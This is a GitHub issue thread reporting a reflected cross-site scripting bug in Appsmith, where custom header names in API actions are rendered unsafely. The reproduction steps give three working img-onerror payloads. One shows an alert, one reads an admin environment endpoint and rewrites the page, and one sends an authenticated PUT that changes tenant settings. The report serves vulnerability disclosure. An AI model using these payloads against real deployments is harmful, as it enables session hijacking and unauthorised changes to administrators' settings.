### ISSUE TITLE
[Security]: Reflected XSS in Header names in API actions #2011

### ISSUE THREAD

**Issue by Irongade** [appsmithorg/appsmith#26216]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### Description

Quoting Astra's report:

> We found that reflected cross-site scripting (XSS) vulnerability exists on the application. Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way.
> 
> An attacker can use this vulnerability to construct a request which if issued by another application user, will execute the JavaScript code supplied by the attacker within the user's browser in the context of that user's session with the application.The attacker-supplied code can perform a wide variety of actions, such as
> 
> Stealing the victim's session token
> Stealing Login credential
> Stealing customer Credit Card Information
> Performing arbitrary actions on the victim's behalf
> Logging user keystrokes

### Steps To Reproduce

Create an API action, with a custom header key as the following:

`<img src=x onerror='alert("this runs")'>`

And a non-empty value like x or something. Other configuration doesn't matter. When we run this API, notice that an alert popup does show up.

This is full script injection. We can directly manipulate DOM.

`<img src=x onerror='fetch("/api/v1/admin/env").then(r=>r.text()).then(body=>document.body.insertAdjacentHTML("beforeend", "<h1 style=\"color:red;font-size:72px;position:absolute;top:0;z-index:9\">Poof!</h1>"))'>`

Or make calls that require authentication, and change settings in Admin Settings.

`<img src=x onerror='fetch("/api/v1/tenants", {body:"{\"googleMapsKey\":\"hahahahaha\"}",method:"PUT",headers:{"Content-Type":"application/json","X-Requested-By":"Appsmith"}});'>`

Public Sample App

### Environment

Production

### Version

Cloud/Self hosted

**Comment by Irongade** [comment]
Issue is also logged in EE [here](https://github.com/appsmithorg/appsmith-ee/issues/2011)

**Comment by Nikhil-Nandagopal** [comment]
@Irongade for security reasons we don't file security issues in the CE repo
